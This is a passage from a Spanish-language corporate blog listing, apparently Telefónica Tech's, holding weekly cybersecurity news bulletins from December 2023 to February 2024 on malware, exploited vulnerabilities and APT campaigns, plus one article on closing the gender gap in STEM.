llamado GoldPickaxe.iOS, diseñado para robar datos de reconocimiento facial, documentos de identidad e interceptar SMS. Se ha atribuido esta amenaza al grupo GoldFactory. El troyano ha estado activo desde mediados de 2023 en Asia, principalmente en Tailandia y Vietnam. El método de ataque es hacerse pasar por bancos locales y organizaciones gubernamentales. El actor amenaza utiliza servicios basados en IA para crear deepfakes, lo que permite el acceso no autorizado a las cuentas bancarias de las víctimas. Se ha utilizado Mobile Device Management (MDM) para manipular dispositivos Apple y se han distribuido enlaces maliciosos a través de mensajería para atraer a las víctimas a aplicaciones fraudulentas. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
16 de febrero de 2024
Estrategias para cerrar la brecha de género en la ciencia y la tecnología
📅 El 11 de febrero se celebra el Día internacional de la mujer y la niña en la ciencia para promover la participación y el reconocimiento de las mujeres en el ámbito científico, inspirar a las niñas y jóvenes a explorar carreras STEM y fomentar la igualdad de género en la ciencia y la tecnología. Rosalind Franklin, Liese Meitner, Ester Lederberg y Ada Lovelace son solo algunas de las mujeres cuyas contribuciones a la ciencia no fueron reconocidas en su momento debido a su género, por no ser hombres. Aunque hemos avanzado mucho, no podemos ignorar la brecha de género que aún existe en los ámbitos de las ciencias, las tecnologías y las matemáticas (STEM), donde las mujeres solo representan el 20% de la fuerza laboral. Empoderar a las mujeres desde el primer día garantiza que los equipos de trabajo en STEM sean diversos. La diversidad fomenta la innovación y la innovación conduce al éxito. Educación Desde temprana edad, los niños son impulsados hacia la ciencia y las matemáticas para convertirse en astronautas, ingenieros y programadores. Mientras, las niñas son dirigidas hacia materias humanísticas y lenguajes, celebradas por su creatividad en lugar de su inteligencia. Se calcula que las niñas pierden la confianza en sus habilidades matemáticas entre los 13 y 15 años, a pesar de superar a los niños de edades similares en estos campos. La educación es por tanto un componente esencial para cerrar la brecha de género en STEM, ya que puede eliminar los sesgos de género subyacentes desde el primer día. Puede dar a las niñas las habilidades técnicas necesarias para convertirse en programadoras, científicas de datos, ingenieras, doctoras… y puede enseñar a todos la importancia de la diversidad. No solo en el ámbito STEM, sino en todas las industrias. "No se trata de arreglar a las mujeres, se trata de reconocer que las niñas y las mujeres jóvenes a menudo aprenden un conjunto de conceptos en los primeros años que limitan su visión de sí mismas" -Gabriela Mueller Mendoza, ponente sobre diversidad en STEM. Las escuelas son el lugar clave para convencer a las niñas desde el primer día de que son igual de capaces que sus homólogos masculinos. Las niñas a menudo no eligen continuar con estas materias porque nunca lo vieron como una posibilidad, tal vez porque ninguna mujer en su familia se dedicó a la ciencia. Alentar a las niñas a creer en su inteligencia es una necesidad. Carrera profesional La falta de modelos a seguir y de experiencia laboral accesible para mostrar a las niñas jóvenes cómo pueden encajar en este campo laboral también es responsable de la brecha de género en STEM. Si bien la educación puede proporcionar las habilidades técnicas necesarias para ser contratadas, nada se compara con la experiencia en la vida real. Las líderes femeninas que ya se encuentran en el campo deben formar parte del movimiento para inspirar a la próxima generación, actuando como mentoras. Esto implica ir a los centros educativos y juveniles para transmitir experiencia y consejos. La educación y la experiencia laboral proporcionan a las niñas la motivación para trabajar en STEM. Diversidad La innovación en el lugar de trabajo requiere diversidad: de género, cultura y edad… para aportar algo nuevo y creativo. Esto significa contratar una fuerza laboral diversa y capacitar a la fuerza laboral existente sobre la importancia de la inclusión. Un impulso hacia la diversidad también puede significar que las empresas deben eliminar los sesgos inconscientes y conscientes, eliminando tanto las barreras legales como las invisibilidades sociales. La solución debe ser un esfuerzo concertado para capacitar a los departamentos de recursos humanos, reclutadores y gestores sobre la importancia de formar equipos diversos y mantenerlos de esa manera, ya sea mediante la capacitación o la contratación directa de mujeres capacitadas para ser parte del cambio. Además, dentro de las empresas debe haber igualdad de oportunidades para que las mujeres sean promovidas. La diversidad también es muy importante en la programación para producir sistemas de aprendizaje automático justos. Si estos sistemas automatizados se alimentan con datos y sistemas sesgados, terminarán perpetuando esos mismos sesgos. La diversidad en los equipos de programación es importante para detectar estos sesgos y mitigarlos. La IA solo aprenderá a ser inclusiva, justa y representativa si nosotros lo somos. La diversidad en el lugar de trabajo significa que hay más oportunidades para las mujeres, lo que las anima a ingresar y mantenerse en carreras STEM. Apoyar a las que están arriba Con demasiada frecuencia, a las mujeres en la cima no se les da el reconocimiento que merecen. Una vez que las mujeres alcanzan la cima deben ser apoyadas, no cuestionadas. De hecho, todavía respecto a ellas se hacen más comentarios sobre lo que están vistiendo que sobre sus logros y lo mucho que han trabajado para llegar allí. Debemos celebrar a esas mujeres que, en nuestra empresa, sector o comunidad, han llegado a lo más alto. Autoconfianza Al igual que con muchas cosas, como mujeres necesitamos tener autoconfianza para lograr lo que queremos, porque no somos menos capaces que nuestros colegas masculinos. Juntas podemos cerrar la brecha de género en STEM. Telefónica Tech #MujeresHacker: talento femenino para acelerar el progreso 17 de agosto de 2023 Publicado 12.7.2023 | Actualizado 11.02.2024.
11 de febrero de 2024
Boletín de Ciberseguridad, 3 - 9 de febrero
Greenbean: nuevo troyano bancario en Android El equipo de investigadores de Cyble ha descubierto un nuevo troyano bancario para Android llamado Greenbean que se propaga a través de un sitio de phishing que promueve un sistema de criptomonedas. Este malware ha sido diseñado para atacar cinco aplicaciones relacionadas con la banca y las criptomonedas. El nombre de la aplicación y la presencia de caracteres chinos y vietnamitas en el código indican que el objetivo principal son los usuarios de Android de esos países. Greenbean utiliza el servicio de Accesibilidad para recopilar las credenciales de las aplicaciones objetivo e incorpora la transmisión de vídeo a través de WebRTC. Por el momento, el sitio de phishing sigue en funcionamiento, lo que sugiere que el malware continúa activo. Más info Descubren fallo crítico en gestor de arranque Shim que afecta a Linux Un investigador de seguridad de Microsoft ha revelado un nuevo fallo crítico en el gestor de arranque de Shim Linux que permite a los atacantes ejecutar código y tomar el control del sistema. La vulnerabilidad ha sido clasificada como CVE-2023-40547 y reside en el código fuente httpboot.c de Shim, que se utiliza para arrancar una imagen de red a través de HTTP. El fallo fue reportado por primera vez el 24 de enero, pero Eclypsium ha ampliado detalles con un nuevo informe publicado el 2 de febrero para llamar la atención sobre esta vulnerabilidad crítica. Más info Publicado un análisis del código del ransomware Black Hunt Los investigadores de Rapid7 Labs han publicado un análisis de una variante del ransomware Black Hunt, activo desde al menos 2022. El código analizado presenta importantes similitudes con el de LockBit, pudiendo haberse usado su código filtrado en Black Hunt; además, sus técnicas resultan parecidas a las de otro ransomware, REvil. Entre las características que diferencian a Black Hunt de otros ransomware, destaca la comprobación inicial de la presencia de un archivo “Vaccine.txt” que, si es detectado, termina la ejecución del malware. Además, el ransomware deshabilita herramientas de seguridad de Windows, elimina las Shadow Copies y, finalmente, cambia la extensión de los archivos cifrados a “.Hunt2”. Los investigadores destacan la importancia de monitorizar esta amenaza, que recientemente llevó a cabo un ataque contra más de 300 empresas en Paraguay. Más info Volt Typhoon amenaza a infraestructuras críticas CISA, juntamente con otras agencias federales y centros de ciberseguridad de Australia, Canadá, Reino Unido y Nueva Zelanda, han emitido un informe detallando las acciones de la APT Volt Typhoon, respaldada por China, y que está dirigida a infraestructuras críticas. El informe enfatiza que Volt Typhoon, tambien conocido como Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite e Insidious Taurus, tiene especial enfoque en las redes IT/OT (tecnología de la información/tecnología operativa) posicionándose previamente, realizando movimiento lateral y manteniendo sigilosa persistencia para luego ejecutar ciberataques disruptivos o destructivos contra infraestructura crítica en caso de generarse una crisis geopolítica o conflicto importante, siendo así una amenaza potencial. En este sentido, el informe señala además que, Volt Typhoon, habría permanecido oculto en la infraestructura crítica de EE UU durante al menos cinco años, utilizando técnicas de ataque Living-off-the-Land (LotL), evadiendo así exitosamente la detección. Asimismo, se advierte que la obsolescencia de software en entornos IT/OT aumenta el riesgo y que la amenaza se extiende más allá de EE UU, con evidencia de ataques a infraestructuras en Australia, Reino Unido, Canadá y Nueva Zelanda. El informe incluye además recomendaciones para la detección y mitigación de esta amenaza. Más info Fallos de seguridad en Ivanti Recientemente se alertaba sobre la explotación activa de la vulnerabilidad 0-day, CVE-2024-21893, que afecta a los dispositivos Ivanti Connect Secure e Ivanti Policy Secure. El equipo de investigaciones de Shadowserver identificó alrededor de 170 direcciones IP intentando atacar activos vulnerables de Ivanti. Aunque se sospechaba que la PoC publicada por Rapid7 pudo haber exacerbado la situación, los ataques ya estaban en curso antes de esto. Ante esta preocupación, la CISA emitió una alerta recomendando desconectar los dispositivos no actualizados, mientras que Ivanti también publicó su propia advertencia. Seguidamente, Ivanti emitió otro aviso de seguridad en el que alertaban acerca de una vulnerabilidad que afecta a las puertas de enlace Connect Secure, Policy Secure y ZTA. El fallo, registrado como CVE-2024-22024, se debe a una debilidad XXE en el componente SAML de las puertas de enlace, lo que permite a atacantes remotos acceder a recursos restringidos en dispositivos vulnerables. En este nuevo aviso Ivanti informa que no tienen evidencia de que alguno de sus clientes haya sido afectado, pero recomiendan tomar medidas de seguridad de inmediato para corregir el fallo. Además, indican que los clientes que aplicaron el parche lanzado el 31 de enero o el 1 de febrero y realizaron un restablecimiento de fábrica de su dispositivo no necesitan hacerlo nuevamente para esta vulnerabilidad. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
9 de febrero de 2024
Boletín de Ciberseguridad, 27 de enero - 2 de febrero
NSA admite la compra masiva de datos de navegación sin autorización La agencia Reuters publicó recientemente que La Agencia de Seguridad Nacional de Estados Unidos (NSA) confirmó haber adquirido registros de navegación en Internet a intermediarios de datos para identificar sitios web y aplicaciones utilizadas por los estadounidenses sin una orden judicial, según declaraciones del senador Ron Wyden. Al parecer, Wyden habría expresado a través de un comunicado su preocupación por financiar una industria cuestionable que aparentemente viola la privacidad y la legalidad; ya que los metadatos de navegación podrían exponer riesgos de privacidad, especialmente en temas sensibles como salud. Por su parte, La NSA aseguró haber tomado medidas de cumplimiento y minimización de datos, pero admitió la compra de información confidencial a terceros. Estos hechos se suman a la tendencia de agencias de inteligencia acerca de comprar datos a empresas, revelando prácticas poco transparentes y posibles violaciones de privacidad. Finalmente, Wyden destaca la falta de notificaciones a los consumidores sobre la venta de datos, señalando que la infracción podría afectar a toda la industria. Más info Nueva vulnerabilidad 0-day de Ivanti explotada activamente La compañía Ivanti ha emitido un nuevo aviso de seguridad alertando sobre dos nuevas vulnerabilidades, de las cuales una se trata de una 0-day que está siendo activamente explotada. En concreto, este nuevo fallo de seguridad ha sido registrado como CVE-2024-21893, CVSSv3 de 8.2, y se trata de una vulnerabilidad de falsificación de solicitudes del lado del servidor en el componente SAML cuyo aprovechamiento permitiría a atacantes eludir la autenticación y acceder a recursos restringidos en dispositivos vulnerables. El otro de los fallos de seguridad es el registrado como CVE-2024-21888, CVSSv3 de 8.8, que afecta al componente web de las puertas de enlace permitiendo a actores amenaza escalar privilegios. Según Ivanti, estos fallos de seguridad afectan a todas las versiones 9.x y 22.x. En último lugar, cabe indicar que la compañía también ha lanzado parches para dos vulnerabilidades 0-day revelados a comienzos de enero CVE-2024-21887, CVSSv3 de 9.1 y CVE-2023-46805, CVSSv3 de 8.2. Más info Expuestas credenciales de operadores de red El equipo de investigadores de Resecurity ha publicado un artículo en el que señala que han identificado un total de 1.572 credenciales pertenecientes a los registros de internet RIPE, AFRINIC y LACNIC expuestas en sitios alojados en la Dark Web. Esta investigación viene dada debido al reciente ciberataque producido contra Orange España, quienes sufrieron una intrusión en su cuenta del Centro de Coordinación de Red RIPE desencadenando en un sabotaje que propició la interrupción del servicio de red a sus clientes durante varias horas. Según los expertos, las credenciales identificadas durante la investigación habrían sido exfiltradas mediante el uso de infostealers como Redline, Azorult o Vidar, entre otros. Cabe indicar que entre las cuentas identificadas se encontraría organizaciones que no se han identificado de índole financiera de Kenia y España, una agencia gubernamental iraquí y proveedores tecnológicos, entre otras. Debido a la criticidad de estos activos, los cuales pueden llegar a derivar en ciberataques masivos, los investigadores señalan la necesidad de tomar medidas de seguridad para proteger activos críticos. Más info Campaña de cryptojacking dirigida a la API de Docker La API de Docker está siendo atacada por una campaña de cryptojacking llamada Commando Cat. Los atacantes utilizan contenedores benignos generados con el proyecto Commando para escapar y ejecutar cargas útiles en el host Docker. La campaña ha estado activa desde principios de 2024 y utiliza Docker como vector de acceso inicial para liberar una serie de cargas útiles, como un minero de criptomonedas y un backdoor. La campaña utiliza comprobaciones para determinar si ciertos servicios están activos en el sistema comprometido antes de pasar a la siguiente fase. Se han observado similitudes con grupos de cryptojacking anteriores, como TeamTNT. En general, Commando Cat es capaz de robar credenciales, actuar como una puerta trasera y minar criptomonedas, lo que lo hace muy versátil. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
2 de febrero de 2024
Boletín de Ciberseguridad, 20 - 26 de enero
CISA ordena la mitigación de dos 0-day en Ivanti CISA ha emitido la primera directiva de emergencia del año ordenando que que mitiguen inmediatamente dos vulnerabilidades 0-day de Ivanti Connect Secure e Ivanti Policy Secure. Las vulnerabilidades han sido clasificadas como CVE-2023-46805, la cuál se trata de una elusión de autentificación, y CVE-2024-21887, que se trata de una inyección de comandos. El proveedor aún no ha publicado parches de seguridad por lo que los dos 0-day permiten a los atacantes moverse lateralmente dentro de la red de un objetivo, extraer datos y establecer persistencia al sistema mediante backdoors. Más info Explotan vulnerabilidad crítica RCE en Atlassian Confluence Investigadores de seguridad han estado observando intentos de explotación de una vulnerabilidad crítica en Atlassian Confluence. La vulnerabilidad ha sido clasificada como CVE-2023-22527, se trata de un fallo de ejecución remota de código y afecta a versiones de Confluence anteriores al 5 de diciembre de 2023 junto con algunas versiones fuera de soporte. El servicio de monitorización de amenazas Shadowserver ha informado de que sus sistemas registraron miles de intentos de explotar la vulnerabilidad, originándose los ataques desde algo más de 600 direcciones IP únicas. Más info Descubierta MOAB, la mayor filtración con 12 terabytes de información Bob Dyachenko y el equipo de Cybernews han descubierto una filtración masiva de datos conocida como MOAB (Mother of all Breaches o Madre de todas las filtraciones) que ha expuesto más de 26.000 millones de registros, lo que la convierte en la filtración más grande descubierta hasta ahora. Esta filtración contiene datos de múltiples filtraciones anteriores y abarca 12 terabytes de información. Los investigadores advierten que estos datos pueden ser utilizados por actores maliciosos para llevar a cabo diversos ataques, como el robo de identidad, el phishing y el acceso no autorizado a cuentas personales. Además, la filtración incluye registros de empresas y organizaciones, así como de varias organizaciones gubernamentales de países como EE. UU., Brasil o Alemania. Pese a parecer un compilado de brechas ya conocidas (Twitter, LinkedIn o Dropbox), no se descarta la inclusión de nuevos datos sensibles. Más info Lanzamiento de la nueva versión 122 de Mozilla Firefox El pasado 23 de enero de 2024, Mozilla lanzó su versión 122, más centrada en la seguridad y la privacidad. Se corrigen un total de 15 vulnerabilidades, cinco de ellas consideradas de alta criticidad y las otras 10, medias. Además, se han introducido un sinfín de características y mejoras que pretenden redefinir la experiencia de navegación de los usuarios en diferentes plataformas. Algunas de sus nuevas características son la resistencia a las huellas dactilares y la posibilidad de copiar URLs sin rastreo de sitios, mostrando así el compromiso de Mozilla de proteger a los usuarios de mecanismos de rastreo invasivos. El navegador también ha ampliado sus capacidades con los usuarios de macOS mediante la compatibilidad de las contraseñas almacenadas en el llavero de iCloud. Más info CherryLoader: malware disfrazado de CherryTree para desplegar Exploits CherryLoader, un nuevo malware basado en Go, ha sido recientemente descubierto. Este software malicioso es un cargador modular de varias etapas, que con su nombre y logotipo imita la apariencia y el nombre de la aplicación legítima CherryTree para engañar a las víctimas e implementar exploits. Descubierto por investigadores de Arctic Wolf Labs en dos intrusiones recientes, CherryLoader elimina herramientas de escalada de privilegios como PrintSpoofer o JuicyPotatoNG. Además, incorpora funciones modularizadas que permiten a los actores amenaza intercambiar exploits sin compilar el código. Aunque no se conoce su método de distribución, se ha observado que CherryLoader se encuentra en un archivo RAR alojado en una dirección IP específica. En cuanto a su proceso de ataque, este implica la descarga de un ejecutable que descomprime e inicia el binario de Golang. Posteriormente, utiliza técnicas sin archivos para ejecutar exploits de escalada de privilegios y establecer persistencia en el dispositivo de la víctima. Más info ⚠️ Para recibir alertas de nuestros expertos en Ciberseguridad, suscríbete a nuestro canal en Telegram: https://t.me/cybersecuritypulse Cyber Security Ciberseguridad y el golpe de los 10.000 millones de dólares 10 de enero de 2024
26 de enero de 2024
Boletín de Ciberseguridad, 13 - 19 de enero
Vulnerabilidades 0-day en Citrix activamente explotadas Citrix ha emitido un aviso de seguridad en donde alerta sobre la explotación de dos 0-day que afectan a sus productos NetScaler ADC y NetScaler Gateway. En concreto, los fallos de seguridad registrados como CVE-2023-6548, CVSSv3 de 5.5 y CVE-2023-6549, CVSSv3 de 8.2 según la emrpesa, afectan la interfaz de administración de NetScaler y su aprovechamiento podrían derivar en una ejecución remota de código y en ataques de denegación de servicio, respectivamente. Cabe indicar que para realizar una ejecución de código se requiere que los atacantes inicien sesión en cuentas con pocos privilegios con acceso a NSIP, CLIP o SNIP de la interfaz de administración. Asimismo, los dispositivos deben estar configurados como una puerta de enlace o un servidor virtual AAA para que sean vulnerables a ataques DoS. En último lugar, cabe indicar que desde Shadowserver señalan que alrededor de 1.500 activos se encuentran expuestos en la red. Más info Corregido un nuevo 0-day activamente explotado en Chrome Google ha lanzado actualizaciones de seguridad para solucionar la primera vulnerabilidad 0-day de Chrome que ha sido explotada desde principios de año. La empresa ha corregido la falla para los usuarios de Windows, Mac y Linux. La vulnerabilidad, conocida como CVE-2024-0519, se debe a una debilidad de acceso a memoria fuera de límites en el motor JavaScript V8 de Chrome, lo que podría permitir a los atacantes acceder a datos confidenciales o causar bloqueos. Además de esta vulnerabilidad, Google también ha parcheado otros fallos, como CVE-2024-0517 y CVE-2024-0518, que permitían la ejecución de código arbitrario en dispositivos comprometidos. Aunque Google tiene conocimiento de los exploits utilizados en ataques, no ha proporcionado más detalles sobre estos incidentes. Más info Infostealers evaden protección XProtect en macOS El equipo de investigadores de SentinelOne han publicado un informe en el que analizan tres ejemplos de infostealers que tienen la capacidad de evadir la solución de seguridad integrada en los sistemas operativos macOS denominada XProtect. En primer lugar, destacan el software malicioso KeySteal que se distribuye como un binario Mach-O y su objetivo es establecer persistencia y exfiltrar información del sistema de administración de contraseñas de macOS Keychain. En segundo lugar, analizan Atomic Stealer, otro infostealer que está escrito en Go, pero que desde SentinelOne señalan que ya han observado variantes en C++ que pueden evadir la detección, ya que ha reemplazado la ofuscación del código con AppleScript e incluye capacidades de antianálisis en una máquina virtual para su análisis. En último lugar, señalan al malware CherryPie que destaca por estar escrito en Go y disponer de herramientas de antianálisis, al igual que en el caso anterior. Más info Reaparece el malware Azorult con nuevas capacidades El malware Azorult, inicialmente descubierto en 2016, ha resurgido nuevamente, de acuerdo con los investigadores de Cyble. Este malware presenta capacidades de infostealer, pudiendo robar credenciales de acceso, historiales de búsqueda y detalles de billeteras de criptomonedas; así como de downloader, lo que le permite descargar un loader de un servidor remoto para posteriormente ejecutar el malware final. Hay que destacar que tanto la ejecución final como la carga del loader evitan ser detectados al ejecutarse en memoria, sin dejar indicios en el disco. Aunque el vector inicial no ha sido confirmado, los investigadores hipotetizan que se podría haber empleado ataques de phishing para distribuir los archivos de acceso directo que se hacen pasar por PDF, conteniendo realmente el malware, que detectaron en VirusTotal. Finalmente, se destaca que en los archivos de acceso directo se detectó un script de PowerShell ofuscado y comandos para ejecutar un archivo por lotes empleando un programados de tareas. Más info GitLab advierte sobre vulnerabilidad crítica zero-click GitLab ha publicado actualizaciones de seguridad para las ediciones Community y Enterprise con el fin de solucionar dos vulnerabilidades críticas, una de las cuales permite el secuestro de cuentas sin interacción del usuario. La vulnerabilidad zero-click ha sido clasificada como CVE-2023-7028, tiene la máxima puntuación de gravedad (10 sobre 10) y se trata de un problema de autenticación que permite que las solicitudes de restablecimiento de contraseña se envíen a direcciones de correo electrónico arbitrarias y no verificadas, lo que permite hacerse con la cuenta. La segunda vulnerabilidad crítica se identifica como CVE-2023-5356, tiene una puntuación de gravedad de 9,6 sobre 10 y un atacante podría aprovecharla para abusar de las integraciones de Slack/Mattermost para ejecutar comandos de barra como otro usuario. Algunas otras vulnerabilidades reportadas han sido clasificadas como CVE-2023-4812, CVE-2023-6955 y CVE-2023-2030. Más info ⚠️ Para recibir alertas de nuestros expertos en Ciberseguridad, suscríbete a nuestro canal en Telegram: https://t.me/cybersecuritypulse Cyber Security CitrixBleed, una vulnerabilidad en fase de explotación masiva 4 de diciembre de 2023
19 de enero de 2024
Boletín de Ciberseguridad, 6 - 12 de enero
0-days explotados en productos Ivanti El equipo de investigadores de Volexity descubrió que actores maliciosos estarían explotando dos vulnerabilidades 0-day que afectan a Ivanti Connect Secure e Ivanti Policy Secure Gateways. En concreto, Ivanti publicó un aviso de seguridad alertando sobre estos dos fallos de seguridad, los cuales han sido registrados como CVE-2023-46805, CVSSv3 de 8.2 según fabricante. Esta vulnerabilidad produce una omisión de autenticación permitiendo a un atacante acceder a recursos restringidos eludiendo las comprobaciones de seguridad, y CVE-2024-21887, CVSSv3 de 9.1 según fabricante, que su explotación podrían permitir a los administradores autenticados ejecutar comandos arbitrarios. Cabe indicar que según los investigadores que han descubierto estas explotaciones de seguridad señalan que todas las versiones de los productos afectados son vulnerables. Volexity atribuye esta campaña a un actor amenaza respaldada por el estado chino. Más info Microsoft parchea un total de 53 vulnerabilidades Las actualizaciones de seguridad del Patch Tuesday de enero de Microsoft solucionan 53 problemas diferentes en varios productos, incluyendo Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, Windows Hyper-V e Internet Explorer. En concreto, dos de las vulnerabilidades solucionadas se consideran críticas, mientras que otras 47 tienen una gravedad alta. La primera vulnerabilidad crítica (CVE-2024-20700) permite la ejecución remota de código en Windows Hyper-V, aunque requiere que el atacante ya tenga acceso a la red restringida. La segunda vulnerabilidad crítica (CVE-2024-20674) afecta a Kerberos de Windows y podría ser explotada por un atacante no autenticado para realizar un ataque machine-in-the-middle (MITM) o suplantación de red local. En ambos casos, el atacante debe haber obtenido acceso a la red restringida antes de lanzar el ataque. Según Microsoft, cabe indicar que ninguno de los problemas corregidos estaría siendo explotados. Más info Vulnerabilidades críticas en Splunk Splunk emitió un total de cuatro avisos de seguridad en donde parchea hasta un total de 15 vulnerabilidades, de las cuales una es considerada como crítica, 12 con riesgo alto y dos de criticidad media. En concreto, el fallo de seguridad con mayor criticidad afecta a Splunk Enterprise Security y es el registrado como CVE-2022-37601, CVSSv3 de 9.8, el cual se trata de un fallo en la función parseQuery. Cabe indicar que dentro de este aviso de seguridad contiene otras seis vulnerabilidades de riesgo alto en paquetes de terceros de Splunk Enterprise Security, las cuales se corrigen actualizando a la versión 7.1.2, 7.2.0, 7.3.0 o superior. Cabe señalar que las dos vulnerabilidades con criticidad media también afectan al mismo producto y su aprovechamiento puede desencadenar en condiciones de denegación de servicio. Por otra parte, destaca el aviso de seguridad que afecta a Splunk User Behavior Analytics que contiene seis vulnerabilidades de alta gravedad y que el fabricante recomienda a sus clientes actualizar a las versiones 5.3.0, 5.2.1 o superiores. Más info NIST publica un informe sobre ataques de adversarial machine learning Investigadores del National Institute of Standards and Technology (NIST) publicaron un informe acerca de ataques que implican adversarial machine learning, así como las posibles mitigaciones de estos. En la guía publicada se incluyen los cuatro principales tipos de ataques que pueden ser empleados contra sistemas de inteligencia artificial: evasión, envenenamiento, privacidad y abuso. Mientras que los ataques de evasión implican alterar una entrada para cambiar la respuesta del sistema, los de envenenamiento consisten en la introducción de datos corruptos en la fase de entrenamiento de la IA. Por otro lado, en los ataques de privacidad los atacantes intentan obtener datos valiosos preguntando a la IA y en los de abuso el objetivo es comprometer las fuentes legítimas de entrenamiento. Aunque la agencia destaca que en la actualidad no existe un método infalible de protección, ha animado a la comunidad a mantener la búsqueda de mejores defensas ante este tipo de ataques. Mas info APT Sea Turtle fija como objetivos organizaciones europeas Según una investigación de Hunt & Hackett, Sea Turtle, también conocido como SILICON, es un grupo de amenazas persistentes avanzadas (APT) con sede en Turquía que se dedica al espionaje y robo de información mediante el secuestro de DNS. El grupo se enfoca en organizaciones de Europa y Oriente Próximo, especialmente en organismos gubernamentales, grupos políticos kurdos, ONG, entidades de telecomunicaciones, ISP, proveedores de servicios de IT y organizaciones de prensa y entretenimiento. Su objetivo es robar datos valiosos y confidenciales, como registros de llamadas y metadatos de conexiones a sitios web. Su modus operandi consiste en interceptar el tráfico de Internet hacia los sitios web de las víctimas para permitir el acceso no autorizado a redes gubernamentales y sistemas organizativos, utilizando para ello un mecanismo de shell inverso para agilizar la recopilación de datos. Más info ⚠️ Para recibir alertas de nuestros expertos en Ciberseguridad, suscríbete a nuestro canal en Telegram: https://t.me/cybersecuritypulse Telefónica Tech Ciberseguridad Ciberseguridad: avances, tendencias y amenazas 28 de diciembre de 2023
12 de enero de 2024
Boletín de Ciberseguridad, 16 - 22 de diciembre
Nuevo 0-day en Google Chrome Google lanzó su octava actualización de emergencia en lo que va de año para parchear una nueva vulnerabilidad 0-day en Chrome, descubierta por el Grupo de Threat Analysis (TAG) de Google. El fallo, conocido como CVE-2023-7024, permitiría realizar un buffer overflow en WebRTC. Esto podría ser explotado por un atacante para ejecutar código malicioso o causar comportamientos no deseados en la aplicación que utiliza WebRTC. Aunque en un principio Google no tendría listo el parche hasta dentro de unos días, la actualización de su navegador ya está disponible y se insta a todos sus usuarios a actualizar a la versión 120.0.6099.129 en dispositivos Mac y Linux y a la versión 120.0.6099.129/130 en Windows. Más información Ivanti corrige multitud de vulnerabilidades críticas La compañía Ivanti emitió un aviso de seguridad en donde corrige un total de 20 vulnerabilidades, de las cuales 13 son consideradas como críticas. En concreto, estos fallos de seguridad afectan a la solución de gestión de dispositivos móviles Avalanche y se deben a un fallo en la pila WLAvalancheService o a las debilidades de desbordamiento de búfer. Según la compañía, un actor amenaza podría aprovechar estas vulnerabilidades mediante el envío de paquetes de datos especialmente diseñados al servidor de dispositivos móviles desencadenando una condición de denegación de servicio (DoS) o permitiendo la realización de ejecución de código remoto sin requerir interacción por parte del usuario del equipo vulnerable. Cabe indicar que el resto de las vulnerabilidades han sido categorizadas con riesgo medio y alto. En último lugar, se recomienda actualizar el activo a la última versión de Avalanche 6.4.2, ya que estos fallos de seguridad se ven afectados en versiones de Avalanche 6.3.1 y superiores. Más información CISA pide el fin de las contraseñas predeterminadas La Agencia de Ciberseguridad CISA emitió un aviso en el que solicita a los fabricantes de tecnología que dejen de utilizar contraseñas predeterminadas en sus dispositivos y software. Alegan que el uso este tipo de contraseña puede llegar a ser utilizado por actores amenaza para acceder a esos dispositivos. En lugar de utilizar una única contraseña por defecto, recomienda a los fabricantes proporcionar contraseñas de configuración únicas y adaptadas para cada producto. También sugiere implementar contraseñas temporales que se desactiven después de la configuración inicial, así como promover el uso de autenticación multifactorial resistente al phishing. CISA ya había emitido un aviso similar hace diez años, destacando los riesgos asociados a las contraseñas por defecto, especialmente en infraestructuras críticas. Más información Incidente de seguridad en MongoDB expone datos de clientes MongoDB, empresa de gestión de bases de datos, ha sufrido un incidente de seguridad que resultó en el acceso no autorizado a sistemas corporativos. La intrusión, identificada el pasado 13 de diciembre, desencadenó una investigación inmediata. Al parecer, se expusieron metadatos de cuentas de clientes e información de contacto, generando preocupaciones sobre posibles usos indebidos de los datos confidenciales. Aunque la empresa activó inmediatamente su respuesta a incidentes al descubrir actividades sospechosas, se cree que el acceso no autorizado pudo haberse llevado a cabo mucho antes de la detección. La CISO de MongoDB, Lena Smart, notificó a los clientes sobre el incidente mediante un correo electrónico, advirtiendo sobre posibles amenazas de ingeniería social y phishing; recomendando además a todos los usuarios habilitar la autenticación multifactor en sus cuentas y cambiar contraseñas. Hasta ahora, MongoDB asegura que no hay indicios de exposición de datos en MongoDB Atlas, su servicio de base de datos en la nube. Más información Terrapin, nuevo ataque dirigido contra las conexiones OpenSSH Investigadores académicos de la Universidad Ruhr de Bochum han desarrollado un nuevo ataque al que han denominado Terrapin, que explota las debilidades del protocolo de la capa de transporte SSH. A través de Terrapin, los atacantes manipulan números de secuencia y son capaces de eliminar o modificar mensajes intercambiados a través del canal de comunicación, lo que conduce a degradar los algoritmos de clave pública utilizados para la autenticación de usuarios y para deshabilitar la protección contra los ataques hacia OpenSSH. Los investigadores también revelaron fallos de implementación en AsyncSSH y han clasificado las vulnerabilidades como CVE-2023-48795, CVE-2023-46445, CVSSv3 5.9 y CVE-2023-46446, CVSSv3 6.8. Cabe destacar que, para una explotación exitosa, los atacantes deben estar en posición MiTM (Man in The Middle) para interceptar y modificar el cambio de protocolo de enlace, así como que la conexión esté asegurada por ChaCha20-Poly1305 o CBC con Encrypt-then-MAC. Algunos proveedores están mitigando los fallos, si bien aún no existe una solución universal. Más información ⚠️ Para recibir alertas de nuestros expertos en Ciberseguridad, suscríbete a nuestro canal en Telegram: https://t.me/cybersecuritypulse Telefónica Tech Cyber Security AI of Things El CNI publica un informe sobre la intersección entre IA y Ciberseguridad 7 de diciembre de 2023 Imagen de Freepik.
22 de diciembre de 2023
Boletín de Ciberseguridad, 9 - 15 de diciembre
